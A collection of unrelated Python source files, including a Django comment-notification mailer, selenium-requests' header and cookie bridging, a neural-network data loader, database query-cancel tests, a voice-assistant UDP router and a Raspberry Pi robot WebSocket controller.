def send_messages(self, messages):
connection = get_connection() # Use default email connection
self._email_thread = Thread(target=connection.send_messages, args=(messages,))
self._email_thread.start()
def get_message_templates(self, text_template, html_template, msg_context):
text_msg_template = loader.get_template(text_template)
text_msg = text_msg_template.render(msg_context)
html_msg = None
if self.is_html:
html_msg_template = loader.get_template(html_template)
html_msg = html_msg_template.render(msg_context)
return text_msg, html_msg
def send_confirmation_request(self, api=False):
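"""Email the anonymous commenter a signed confirmation link (API or web URL, depending on the caller)"""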
comment_dict = self.comment.to_dict()
receivers = [comment_dict['email']]
key = signing.dumps(comment_dict, compress=True)
text_template = 'comment/anonymous/confirmation_request.txt'
html_template = 'comment/anonymous/confirmation_request.html'
subject = EmailInfo.CONFIRMATION_SUBJECT
if api:
confirmation_url = f'/api/comments/confirm/{key}/'
else:
confirmation_url = reverse('comment:confirm-comment', args=[key])
context = self.get_msg_context(confirmation_url=confirmation_url)
text_msg, html_msg = self.get_message_templates(text_template, html_template, context)
msg = self.get_message(subject, text_msg, receivers, html_msg=html_msg)
self.send_messages([msg])
def get_thread(self):
if self.comment.is_parent:
return self.comment.content_object
return self.comment.parent
def get_thread_name(self):
if self.comment.is_parent:
return str(self.comment.content_object)
return str(self.comment.parent).split(':')[0]
def get_subject_for_notification(self, thread_name):
username = get_username_for_comment(self.comment)
return EmailInfo.NOTIFICATION_SUBJECT.format(username=username, thread_name=thread_name)
def get_messages_for_notification(self, thread_name, receivers):
text_template = 'comment/notifications/notification.txt'
html_template = 'comment/notifications/notification.html'
subject = self.get_subject_for_notification(thread_name)
messages = []
for receiver in receivers:
context = self.get_msg_context(thread_name=thread_name, receiver=receiver.username)
text_msg, html_msg = self.get_message_templates(text_template, html_template, context)
messages.append(self.get_message(subject, text_msg, [receiver.email], html_msg=html_msg))
return messages
def send_notification_to_followers(self):
thread = self.get_thread()
followers = Follower.objects.filter_for_model_object(thread).exclude(email=self.comment.email)
if not followers:
return
thread_name = self.get_thread_name()
messages = self.get_messages_for_notification(thread_name, followers)
self.send_messages(messages)
|
request.py
|
import json
import socket
import threading
import warnings
import requests
import six
import tldextract
from selenium.common.exceptions import NoSuchWindowException, WebDriverException
from six.moves import BaseHTTPServer
from six.moves.urllib.parse import urlparse
FIND_WINDOW_HANDLE_WARNING = (
'Created window handle could not be found reliably. Using less reliable '
'alternative method. JavaScript redirects are not supported and an '
'additional GET request might be made for the requested URL.'
)
headers = None
update_headers_mutex = threading.Semaphore()
update_headers_mutex.acquire()
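# The semaphore is acquired right away so that the later acquire() in get_webdriver_request_headers() blocks
# until do_GET() has captured the headers and released it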
class SeleniumRequestsException(Exception):
pass
# Using a global value to pass around the headers dictionary reference seems to be the easiest way to get access to it,
# since the HTTPServer doesn't keep a reference to the HTTPRequestHandler instance
class HTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
global headers
headers = requests.structures.CaseInsensitiveDict(self.headers if six.PY3 else self.headers.dict)
update_headers_mutex.release()
self.send_response(200)
self.end_headers()
# Immediately close the window as soon as it is loaded
self.wfile.write(six.b('<script type="text/javascript">window.close();</script>'))
# Suppress unwanted logging to stderr
def log_message(self, format, *args):
pass
def get_unused_port():
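# Bind to port 0 so the OS picks a free port, then close the socket and return the chosen port number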
socket_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_.bind(('', 0))
address, port = socket_.getsockname()
socket_.close()
return port
def get_webdriver_request_headers(webdriver):
# There's a small chance that the port was taken since the call of get_unused_port(), so make sure we try as often
# as needed
while True:
port = get_unused_port()
try:
server = BaseHTTPServer.HTTPServer(('', port), HTTPRequestHandler)
break
except socket.error:
pass
threading.Thread(target=server.handle_request).start()
original_window_handle = webdriver.current_window_handle
webdriver.execute_script("window.open('http://127.0.0.1:%d/', '_blank');" % port)
update_headers_mutex.acquire()
# Not optional: Make sure that the webdriver didn't switch the window handle to the newly opened window. Behaviors
# of different webdrivers seem to differ here. Workaround for Firefox: If a new window is opened via JavaScript as a
# new tab, requesting self.current_url never returns. Explicitly switching to the current window handle again seems
# to fix this issue.
webdriver.switch_to.window(original_window_handle)
global headers
headers_ = headers
headers = None
# Remove the host header, which will simply contain the localhost address of the HTTPRequestHandler instance
del headers_['host']
return headers_
def prepare_requests_cookies(webdriver_cookies):
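# Convert the WebDriver's cookie dicts into a plain name -> value mapping usable by Requests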
return {str(cookie['name']): str(cookie['value']) for cookie in webdriver_cookies}
def get_tld(url):
components = tldextract.extract(url)
# Since the registered domain could not be extracted, assume that it's simply an IP and strip away the protocol
# prefix and potentially trailing rest after "/" away. If it isn't, this fails gracefully for unknown domains, e.g.:
# "http://domain.onion/" -> "domain.onion". If it doesn't look like a valid address at all, return the URL
# unchanged.
if not components.registered_domain:
try:
return url.split('://', 1)[1].split(':', 1)[0].split('/', 1)[0]
except IndexError:
return url
return components.registered_domain
def find_window_handle(webdriver, predicate):
original_window_handle = webdriver.current_window_handle
if predicate(webdriver):
return original_window_handle
# Start search beginning with the most recently added window handle: the chance is higher that this is the correct
# one in most cases
for window_handle in reversed(webdriver.window_handles):
if window_handle == original_window_handle:
continue
# This exception can occur if the window handle was closed between accessing the window handles and attempting
# to switch to it, in which case it can be silently ignored.
try:
webdriver.switch_to.window(window_handle)
except NoSuchWindowException:
continue
if predicate(webdriver):
return window_handle
# Simply switch back to the original window handle and return None if no matching window handle was found
webdriver.switch_to.window(original_window_handle)
def make_match_domain_predicate(domain):
def predicate(webdriver):
try:
return get_tld(webdriver.current_url) == domain
# This exception can occur if the current window handle was closed
except NoSuchWindowException:
pass
return predicate
class RequestsSessionMixin(object):
def __init__(self, *args, **kwargs):
super(RequestsSessionMixin, self).__init__(*args, **kwargs)
self.requests_session = requests.Session()
self.__has_webdriver_request_headers = False
self.__is_phantomjs = self.name == 'phantomjs'
self.__is_phantomjs_211 = self.__is_phantomjs and self.capabilities['version'] == '2.1.1'
# Workaround for PhantomJS bug: https://github.com/ariya/phantomjs/issues/14047
def add_cookie(self, cookie_dict):
try:
super(RequestsSessionMixin, self).add_cookie(cookie_dict)
except WebDriverException as exception:
details = json.loads(exception.msg)
if not (self.__is_phantomjs_211 and details['errorMessage'] == 'Unable to set Cookie'):
raise
def request(self, method, url, **kwargs):
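# Capture the webdriver's default request headers once, switch to (or open) a window handle on the requested
# domain, merge the WebDriver's cookies into the request, and write the response cookies back to the WebDriver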
if not self.__has_webdriver_request_headers:
# Workaround for Chrome bug: https://bugs.chromium.org/p/chromedriver/issues/detail?id=1077
if self.name == 'chrome':
window_handles_before = len(self.window_handles)
self.requests_session.headers = get_webdriver_request_headers(self)
# Wait until the newly opened window handle is closed again, to prevent switching to it just as it is
# about to be closed
while len(self.window_handles) > window_handles_before:
pass
else:
self.requests_session.headers = get_webdriver_request_headers(self)
self.__has_webdriver_request_headers = True
# Delete cookies from the request headers, to prevent overwriting manually set cookies later. This should
# only happen when the webdriver has cookies set for the localhost
if 'cookie' in self.requests_session.headers:
del self.requests_session.headers['cookie']
original_window_handle = None
opened_window_handle = None
requested_tld = get_tld(url)
if not get_tld(self.current_url) == requested_tld:
original_window_handle = self.current_window_handle
# Try to find an existing window handle that matches the requested top-level domain
predicate = make_match_domain_predicate(requested_tld)
window_handle = find_window_handle(self, predicate)
# Create a new window handle manually in case it wasn't found
if not window_handle:
previous_window_handles = set(self.window_handles)
components = urlparse(url)
self.execute_script("window.open('%s://%s/', '_blank');" % (components.scheme, components.netloc))
difference = set(self.window_handles) - previous_window_handles
if len(difference) == 1:
opened_window_handle = difference.pop()
self.switch_to.window(opened_window_handle)
else:
warnings.warn(FIND_WINDOW_HANDLE_WARNING)
opened_window_handle = find_window_handle(self, predicate)
# Window handle could not be found during first pass. There might have been a redirect and the top-
# level domain changed
if not opened_window_handle:
response = self.requests_session.get(url, stream=True)
current_tld = get_tld(response.url)
if current_tld != requested_tld:
predicate = make_match_domain_predicate(current_tld)
opened_window_handle = find_window_handle(self, predicate)
if not opened_window_handle:
raise SeleniumRequestsException('window handle could not be found')
# Acquire WebDriver's cookies and merge them with potentially passed cookies
cookies = prepare_requests_cookies(self.get_cookies())
if 'cookies' in kwargs:
cookies.update(kwargs['cookies'])
kwargs['cookies'] = cookies
response = self.requests_session.request(method, url, **kwargs)
# Set cookies received from the HTTP response in the WebDriver
current_tld = get_tld(self.current_url)
for cookie in response.cookies:
# Setting domain to None automatically instructs most webdrivers to use the domain of the current window
# handle
cookie_dict = {'domain': None, 'name': cookie.name, 'value': cookie.value, 'secure': cookie.secure}
if cookie.expires:
cookie_dict['expiry'] = cookie.expires
if cookie.path_specified:
cookie_dict['path'] = cookie.path
# Workaround for PhantomJS bug: PhantomJS doesn't accept None
if self.__is_phantomjs:
cookie_dict['domain'] = current_tld
self.add_cookie(cookie_dict)
# Don't keep cookies in the Requests session, only use the WebDriver's
self.requests_session.cookies.clear()
if opened_window_handle:
self.close()
if original_window_handle:
self.switch_to.window(original_window_handle)
return response
|
loader.py
|
# Copyright 2018 Jörg Franke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import threading
from queue import Queue
import numpy as np
from adnc.data.utils.batch_generator import BatchGenerator
from adnc.data.tasks.repeat_copy import CopyTask
from adnc.data.tasks.cnn_rc import ReadingComprehension
from adnc.data.tasks.babi import bAbI
class DataLoader():
"""
The data loader loads and process the datasets and provides iterators for training or inference.
"""
def __init__(self, config, word_dict=None, re_word_dict=None):
"""
Args:
config: dict with the config to pre-process the dataset
word_dict: dict with word-feature pairs, optional
re_word_dict: dict with feature-word pairs, optional
"""
self.config = config
if config['data_set'] == 'copy_task':
self.dataset = CopyTask(self.config)
elif config['data_set'] == 'cnn':
self.dataset = ReadingComprehension(self.config)
elif config['data_set'] == 'babi':
self.dataset = bAbI(self.config, word_dict, re_word_dict)
@property
def vocabulary_size(self):
return self.dataset.vocabulary_size
@property
def x_size(self):
return self.dataset.x_size
@property
def y_size(self):
return self.dataset.y_size
def batch_amount(self, set_name):
"""
Calculates the batch amount given a batch size
Args:
set_name: str, name of dataset (train, test, valid)
Returns: int, number of batches
"""
if 'max_len' in self.config.keys():
return np.floor(
self.dataset.sample_amount(set_name, self.config['max_len']) / self.config['batch_size']).astype(int)
else:
return np.floor(self.dataset.sample_amount(set_name) / self.config['batch_size']).astype(int)
def sample_amount(self, set_name):
return self.dataset.sample_amount(set_name)
def get_sample(self, set, number):
return self.dataset.get_sample(set, number)
def decode_output(self, sample, prediction):
return self.dataset.decode_output(sample, prediction)
def get_data_loader(self, set_name, shuffle=True, max_len=False, batch_size=None, get_shuffle_option=False):
"""
Provides a data iterator of the given dataset.
Args:
set_name: str, name of dataset
shuffle: bool, shuffle set or not
max_len: int, max length in time of sample
batch_size: int, batch size
get_shuffle_option: bool, returns shuffle function
Returns: iter, iterator over dataset
"""
if batch_size is None:
batch_size = self.config['batch_size']
stream_loader_pre = BatchGenerator(self.dataset, set_name, batch_size, shuffle=shuffle, max_len=max_len)
stream_loader = self._generate_in_background(stream_loader_pre, num_cached=self.config['num_chached'],
threads=self.config['threads'])
if get_shuffle_option:
return stream_loader, stream_loader_pre.shuffle_order
else:
return stream_loader
@staticmethod
def _generate_in_background(batch_gen, num_cached=10, threads=1):
"""
Starts threads with parallel batch generator for faster iteration
Args:
batch_gen: func, the batch generator
num_cached: int, numb of caches batches
threads: int, numb of parallel threads
Returns: iter, iterator over dataset
"""
queue = Queue(maxsize=num_cached)
sentinel = object()
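# each producer puts the sentinel after exhausting the generator; the consumer loop below stops at the first sentinel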
def producer():
for item in batch_gen:
queue.put(item)
queue.put(sentinel)
threads = [threading.Thread(target=producer) for _ in range(threads)]
for t in threads:
t.daemon = True
t.start()
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
|
test_utils.py
|
# coding: utf-8
#
import time
import threading
import pytest
from uiautomator2 import utils
def test_list2cmdline():
testdata = [
[("echo", "hello"), "echo hello"],
[("echo", "hello&world"), "echo 'hello&world'"],
[("What's", "your", "name?"), """'What'"'"'s' your 'name?'"""]
]
for args, expect in testdata:
cmdline = utils.list2cmdline(args)
assert cmdline == expect, "Args: %s, Expect: %s, Got: %s" % (args, expect, cmdline)
def test_inject_call():
def foo(a, b, c=2):
return a*100+b*10+c
ret = utils.inject_call(foo, a=2, b=4)
assert ret == 242
with pytest.raises(TypeError):
utils.inject_call(foo, 2)
def test_method_threadsafe():
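# two threads call a.call() concurrently; the decorator serializes them so both increments land and n == 2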
class A:
n = 0
@utils.method_threadsafe
def call(self):
v = self.n
time.sleep(.5)
self.n = v + 1
a = A()
th1 = threading.Thread(name="th1", target=a.call)
th2 = threading.Thread(name="th2", target=a.call)
th1.start()
th2.start()
th1.join()
th2.join()
assert 2 == a.n
|
core.py
|
import subprocess, socketserver, socket, argparse, re, os, selflib, pipes, time, configparser
from multiprocessing import Process
from selflib import *
# These values are set in load_config, from the values in selflib.py. just here for global reference. Maybe move to main?
COMMAND = "python3" # this is just because every skill is python. Ideally, this wont need to preface every command. Maybe just use a shebang?
base = "./" # Well. This needs to be scrubbed... what should it be?
stt = base+"sphinx-server.py"
PARSER = base+"padatious-parser.py" # this conflicts w/ arg parser. be careful changing it
version = "0.1.0"
database = base+"sqldatabase.py"
formatter = base+"command-formatter.py"
gui = base+"gui"
#CONFIG = "~/.config/assistant/core.conf" # The config directory should probably be broadcast
#LOG_DIR = "/var/log/assistant/" # this is a goal. Not set up yet
# this is the pipeline the message goes through. to hack this, just inject a small method that checks the current spot in the path and injects your custom command
message_path = ["parser","command-formatter","command"] # you can hack in extra modules here if you'd like
''' To have assistant handle non-text data (such as audio or pictures), just pipe the binary form into the message via stdout, and give it a custom component tag to run '''
class AssistantUDPHandler(socketserver.BaseRequestHandler):
# This is the handler function; the server runs an endless loop, so handle() is invoked for every incoming request
def handle(self):
notify("Some data was recieved!")
data = self.request[0].strip() # remove that trailing '\n' that is added for some reason...
socket = self.request[1]
notify("{} wrote:".format(self.client_address[0]))
notify(data)
data = data.decode('utf-8')
message = deserialize(data) # this throws an error for non-KVP data; if it's untagged, it puts it in... [original]
loud_notify("MESSAGE", message) #<- this is where the message is coming from...
post_office(message) # Determine where the message should go from here
def log_and_tag(message):
# tag original data
# log original data
message["original"] = message["payload"] # this may be redundant, since it's also the first in the chain
message["id"] = 1 # but actually, it should generate a new ID based on the table its being logged into
logger = Process(target=log,args=(message,))
logger.run()
return message
def post_office(message): # this is the primary routing service
# I can expect it to be
notify("sorting in the post office")
# verify id
if 'id' not in message: # if its a new message, it also ensures that it's in proper format
message = log_and_tag(message)
# Do I want these to run independently? Or only perform one function.
if 'core' in message:
print("System functions not yet implemented")
elif 'custom' in message and message['custom'] is not None: # a custom hook. have it run a custom post_office here
print("Doing something custom")
elif 'fallback' in message: # this shouldn't be explicit, per se....
print("Fallback wouldn't be in message. It should be what happens if no parse is found")
elif 'from' in message and message['from'] in message_path: # if it came from the core, and is not a new prompt
# if 'chain' in message: # this is where I add the chain logic
if message['payload'] == "No matches" and message['from'] == "parser":
user_notify("Message: \"%s\" does not match a command"%(message['original']))
elif message['from'] == "parser": # I don't like how this is all being evaluated here. perhaps post_office() should be moved out to a separte file
serial = serialize(message) # serializes with json
command = [formatter,"-f",serial,"-v"]
data = call_application(command) # call application can be found in selflib.py
response = data.decode('utf-8')
print(response)
else:
# if we somehow got here, without going through the command-formatter. Good for testing if you're working on the formatter
user_notify("Payload: %s. It matched a command. It appears we have reached the end"%(message["payload"]))
print("It appears we have reached the end")
else: # This sends the utterance to the parser. What happens after it's parsed? format for cli, and run program.
notify("Unsure what to do, sending to %s"%(message_path[0])) # send it from the start of the pipeline
message['from'] = message_path[0] # append the parser tag to the to/from
command = [PARSER,"-p",message['payload']]
notify("Sending this command: %s"%(command))
notify("%s: %s"%(message_path[0],PARSER))
notify("MESSAGE: %s"%(message['payload']))
payload = call_application(command).decode('utf-8')
message['payload'] = deserialize(payload)
notify(message['payload'])
serial = serialize(message)
# check for next step in config?
message_server(serial)
def log(message): # Later, perhaps... check how inefficient this may be. Also it's not robust
notify("logging %s"%(message))
META_ID = "meta_id"
#meta_id = get_metadata_id_from("metadata") # oh shit, I don't think I need this here
meta_id = 1
table = "logged_input" # moving this up, so it can be overwritable
# Check if the table exists. I can change this so [core] allows for different databases
notify("Checking if table %s exists"%(table)) # this needs to be less hardcoded
command = ["-chk",table]
data = call_database(command)
response = data.decode('utf-8')
    # this is a bit hardcoded for a flexible logger
if 'False' in response: # if response == "False" wasn't working. this does
notify("The table does not exist")
# headers = get_utt_id() # this gets the unique_id from the table
# headers += utterance
# headers += get_meta_id() # this gets metadata for the specific table
headers = "utterance" # <- needs meta_id generated. metas primary key
command = ["-t",table,"-c",headers] # utterance needs to be replace w/ config check. this is failing because it needs data to input?
call_database(command) # I am not worried about the callback
command = ["-t",table,"--link-metadata"]
call_database(command) #this is just added in. I could probably just directly link it. I may need a logic change, but this is generic to add to a table later
data = "%s,%s"%(message["payload"],meta_id) # This uses the earlier generated meta_id
# this is actually an enter-and-get-id for the metadata, so I can put the foreign key in the new slot
notify("Sending data to sqldatabase: %s"%(data))
command = ["-t", table, "--insert-and-get-id", data] # I am getting this ID, because it will be used as the message['id']
data = call_database(command)
id = data.decode('utf-8').strip() # the message['id']
message["id"] = id
    # insert the data into the table that I just expanded....? that should just be metadata... oh! It's only adding data
#text_command = "INSERT %s IN %s WHERE ID = %d"%(data,table,int(id)) # I need to make this a built in command
#command = ["-t", table, "--text", text_command]
#call_database(command)
notify("Logged %s"%(message["payload"]))
def load_config(): # using configparser
config = configparser.ConfigParser()
try:
config.read('.assistantrc')
except:
notify("There doesn't seem to be a config file...")
os.environ["ASST_DATABASE"] = database # set this externally for other programs to see
os.environ["ASST_BASE"] = base
os.environ["ASST_COMMAND"] = COMMAND
#os.environ["ASST_CONFIG"] = CONFIG
notify("config loaded")
def start_ui(): # You should be a separate process, that listens over the network, and interacts with components over its own shell
subprocess.Popen(["python3",gui]) # This doesn't interact w/ core once started
# Perhaps it DOES interact with core. I just haven't built it yet
def start_stt(): # You should be a separate process that sends things over the network
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# make the socket look like a file
sock.connect(("localhost",9999))
    pipefile = sock.makefile('w') # this should be in memory only. change it to IOFile or something
command = [COMMAND,"sphinx-server.py","-d"]
subprocess.run(command, stdout=pipefile) # this is a special case, as a daemon its always talking to core.
    # This should be printing its STDOUT to the server handler
def start_applications(): # run at the start of core.py
notify("Starting applications")
    # start_ui() # start the user interface
# notify("Started UI")
# start_parser() # parser needs to be a service, due to how padatious loads/trains
# notify("Started Padatious")
# start_stt()
# notify("Started STT")
def install():
    # run the bash script for setting up assistant
shell_out("./setup-database")
def get_record(name): # returns a record in dict format
return run_component([COMMAND,LOOKUP,'-q',name])
def stop_applications():
notify("Stopping applications")
def edit_utterances(): # load a csv file in libreoffice calc to edit. probably will move this out of core
command = [COMMAND,database,"-wc","-t","utterance"]
filename = subprocess.run(command, stdout=subprocess.PIPE)
filename = filename.stdout.decode('utf-8')
os.system("libreoffice --calc -o %s"%(base+filename)) # I need this to trigger an update on next load
def shell_out(filename): # Drop to the editor, for editing core scripts
os.system("emacs %s"%(filename))
def send_over_network(command): # this is just a basic UDP client
# this sends an untagged message to core. how is it handled...
time.sleep(1) # wait until the server has joined the main process.
host, port = "localhost", 9999
data = command
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(data + "\n", "utf-8"), (host, port))
def start_server(): # Start UDP server
HOST, PORT = "localhost", 9999
with socketserver.UDPServer((HOST,PORT), AssistantUDPHandler) as server:
server.serve_forever()
if __name__ == '__main__': # Main program loop
parser = argparse.ArgumentParser(description="main udp server and router")
parser.add_argument('-c', dest='command', help="enter a textual command (as if spoken)")
parser.add_argument('-v', dest='verbose', help="make core verbose", action='store_true')
parser.add_argument('-i', dest='install', help="install a command", action='store_true')
parser.add_argument('-u', dest='utt', help="edit stored utterances", action='store_true')
args = parser.parse_args()
if args.verbose == True:
selflib.verbose = True
load_config()
start_applications() # I need the net_server object, since this becomes the main program. SocketServer UDP runs in its own thread, I suppose (keep an eye out for memory leaks)
# Set up how to handle command line switches. Maybe I need to queue these up..?
if args.install == True: # this may need to be changed if core is the server
install()
exit()
if args.utt is True:
edit_utterances()
if args.command is not None:
message = {}
message['payload'] = args.command
serialized = selflib.serialize(message)
send_internal = Process(target=send_over_network, args=(serialized,), daemon=True) # this doesn't seem to be running separate
send_internal.start() # this is daemonized so that net_server displays it in stdout
notify("Starting Web Server")
start_server()
|
test_cancel.py
|
# Copyright (c) 2019-2021 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from aiovertica import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
        # Cursor.cancel() should not be supported any more
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
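        # A helper process cancels the connection after a short delay while the main
        # thread is blocked in a long-running cross-join query; the query should then
        # fail with QueryCanceled and the connection should remain usable.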
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
# Must be able to successfully run next query
cur.execute("SELECT 1")
res = cur.fetchall()
self.assertListOfListsEqual(res, [[1]])
def test_connection_cancel_returned_query(self):
with self._connect() as conn:
cur = conn.cursor()
cur.execute("DROP TABLE IF EXISTS vptest")
try:
# Creating and loading table
cur.execute("CREATE TABLE vptest(id INTEGER, time TIMESTAMP)")
cur.execute("INSERT INTO vptest"
" SELECT row_number() OVER(), slice_time"
" FROM("
" SELECT slice_time FROM("
" SELECT '2021-01-01'::timestamp s UNION ALL SELECT '2022-01-01'::timestamp s"
" ) sq TIMESERIES slice_time AS '1 second' OVER(ORDER BY s)"
" ) sq2")
# This query returns over 30,000,000 rows. We cancel the command after
# reading 100 of them, and then continue reading results. This quickly
# results in an exception being thrown due to the cancel having taken effect.
cur.execute("SELECT id, time FROM vptest")
nCount = 0
with self.assertRaises(errors.QueryCanceled):
while cur.fetchone():
nCount += 1
if nCount == 100:
conn.cancel()
# The number of rows read after the cancel message is sent to the server can vary.
# 100,000 seems to leave a safe margin while still falling well short of
# the 30,000,000+ rows we'd have read if the cancel didn't work.
self.assertTrue(100 <= nCount < 100000)
# Must be able to successfully run next query
cur.execute("SELECT 1")
res = cur.fetchall()
self.assertListOfListsEqual(res, [[1]])
finally:
cur.execute("DROP TABLE IF EXISTS vptest")
exec(CancelTestCase.createPrepStmtClass())
|
CrossPi.py
|
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from gopigo import *
import time
import sys
import subprocess
import os
import threading
import psutil
conns = []
class Leds:
def __init__(self):
print 'Leds Ready'
def on(self):
led_on(LED_L)
led_on(LED_R)
def off(self):
led_off(LED_L)
led_off(LED_R)
# Nécéssite le capteur "Ultrasonic Ranger" de chez DEXTERINDUSTRIES"
class Capteurs:
def __init__(self):
print 'Capteurs Ready'
def ultrasonic(self):
return us_dist(15)
# Requires the collision sensor from GROVE
# to be plugged into port D10
class Attitude:
def __init__(self):
print 'Attitude Ready'
def collision(self):
collision_sensor = 10
pinMode(collision_sensor,"INPUT")
return digitalRead(collision_sensor)
        # returns 1 if no collision is detected; returns 0 on collision
class Monitor:
def __init__(self):
print 'Monitor Ready'
def volts(self):
return volt()
def cpuSpeed(self):
return psutil.cpu_percent(interval=0.1)
def temperature(self):
temp = os.popen('cat /sys/class/thermal/thermal_zone0/temp').readline()
temp = float(temp) / 1000
temp = round(temp,1)
return temp
class Camera:
cameraStreamerProcess = None
def __init__(self):
if self.cameraStreamerProcess == None or self.cameraStreamerProcess.poll() != None:
self.cameraStreamerProcess = subprocess.Popen( [ "/usr/local/bin/raspberry_pi_camera_streamer" ] )
print 'Camera Ready'
def stop(self):
if self.cameraStreamerProcess != None:
self.cameraStreamerProcess.terminate()
# Requires the servo motor from DEXTERINDUSTRIES
class ServoMotor:
def __init__(self):
print 'ServoMotor Ready'
servo(90)
time.sleep(1)
disable_servo()
def rotate(self, angle):
angle = 180 - angle
servo(angle)
time.sleep(1.2)
disable_servo()
class Motors:
def __init__(self):
print 'Motors Ready'
stop()
def setBoth(self, left, right):
set_left_speed(left)
set_right_speed(right)
class AutoPilot(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self._etat = False
self._pause = False
def run(self):
self._etat = True
while self._etat:
if self._pause:
time.sleep(0.1)
continue
print 'AutoPilot actif'
time.sleep(1)
print "AutoPilot Stop"
def on(self):
self._pause = False
def off(self):
self._pause = True
def stop(self):
self._etat = False
# Sends system information and the data gathered by the sensors to the interface
class System(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self._etat = False
self._pause = False
def run(self):
self._etat = True
while self._etat:
if self._pause:
time.sleep(0.1)
continue
for conn in conns:
conn.sendMessage(u'Volts '+str(monitor.volts()))
conn.sendMessage(u'Cpu '+str(monitor.cpuSpeed()))
conn.sendMessage(u'Temperature '+str(monitor.temperature()))
conn.sendMessage(u'Ultrasons '+str(capteurs.ultrasonic()))
# conn.sendMessage(u'Collision '+str(attitude.collision()))
time.sleep(.5)
print "System Stop"
def pause(self):
self._pause = True
def resume(self):
self._pause = False
def stop(self):
self._etat = False
class CrossPi(WebSocket):
def handleConnected(self):
conns.append(self)
print self.address, 'connected'
def handleClose(self):
conns.remove(self)
print self.address, 'Disconnected'
def handleMessage(self):
print self.data
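        # Messages have the form "<Module> [command] [arg1] [arg2]"; numeric
        # arguments are converted to int where possible.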
module = None
commande = None
argument = None
argument2 = None
cmd = self.data
x = cmd.split(' ')
nb = len(x)
if nb == 1:
module = x[0]
elif nb == 2:
module = x[0]
commande = x[1]
elif nb == 3:
module = x[0]
commande = x[1]
try:
argument = int(x[2])
except ValueError:
argument = x[2]
elif nb == 4:
module = x[0]
commande = x[1]
try:
argument = int(x[2])
except ValueError:
argument = x[2]
try:
argument2 = int(x[3])
except ValueError:
argument2 = x[3]
else:
pass
if module == 'Leds':
if commande != None:
if commande == 'on':
leds.on()
self.sendMessage(u'Leds on')
elif commande == 'off':
leds.off()
self.sendMessage(u'Leds off')
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'Servo':
if commande != None:
if commande == 'Rotate':
if argument != None:
servomotor.rotate(argument)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'Motors':
if commande != None:
if commande == 'none':
if argument != None:
stop()
elif commande == 'go':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument2)
bwd()
elif commande == 'back':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument2)
fwd()
elif commande == 'rotateLeft':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument)
right_rot()
elif commande == 'rotateRight':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument)
left_rot()
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'AutoPilot':
if commande != None:
if commande == 'on':
autopilot.on()
self.sendMessage(u'Autopilot on')
elif commande == 'off':
autopilot.off()
self.sendMessage(u'Autopilot off')
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
elif module == 'System':
if commande != None:
if commande == 'pause':
system.pause()
elif commande == 'resume':
system.resume()
elif commande == 'stop':
autopilot.stop()
system.stop()
autopilot.join()
system.join()
time.sleep(0.5)
sys.exit(0)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
else:
if module == None:
module = ' '
if commande == None:
commande = ' '
if argument == None:
argument = ' '
if argument2 == None:
argument2 = ' '
self.sendMessage(u' Commande introuvable : ' + module + ' ' + commande + ' ' + str(argument) + ' ' + str(argument2))
if __name__ == '__main__':
leds = Leds()
capteurs = Capteurs()
attitude = Attitude()
monitor = Monitor()
camera = Camera()
servomotor = ServoMotor()
motors = Motors()
autopilot = AutoPilot()
system = System()
    # Change the IP address to your own
server = SimpleWebSocketServer('192.168.0.24', 1234, CrossPi)
socket = threading.Thread(target=server.serveforever)
socket.start()
system.start()
autopilot.start()
autopilot.off()
|
MainRunner.py
|
import _thread
import datetime
import logging
import threading
import time
import traceback
from multiprocessing import Process, Value
import utils
from BiliLive import BiliLive
